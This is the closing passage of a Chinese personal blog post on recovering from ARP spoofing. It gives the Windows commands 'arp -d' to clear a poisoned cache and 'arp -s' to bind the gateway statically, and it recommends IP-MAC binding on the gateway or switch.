最后,到不能打开网页的机器上执行这个命令:点击开始-->运行-->cmd-->arp -d回车,清掉被污染的ARP缓存就可以了。注意:只有在毒源已经断网之后这样做才有效,否则几秒钟后网关条目又会被欺骗回去;在彻底清除之前,可以先用 arp -s <网关IP> <网关真实MAC> 把网关绑定成静态条目临时顶一下(重启后失效,需要重新执行),有条件的话在网关/交换机上同时做IP-MAC绑定。

终于一切又恢复了平静,是不是很有成就感呢,呵呵!

本人的第一篇正式的BLOG技术文章终于写完了,希望大家能喜欢看!  
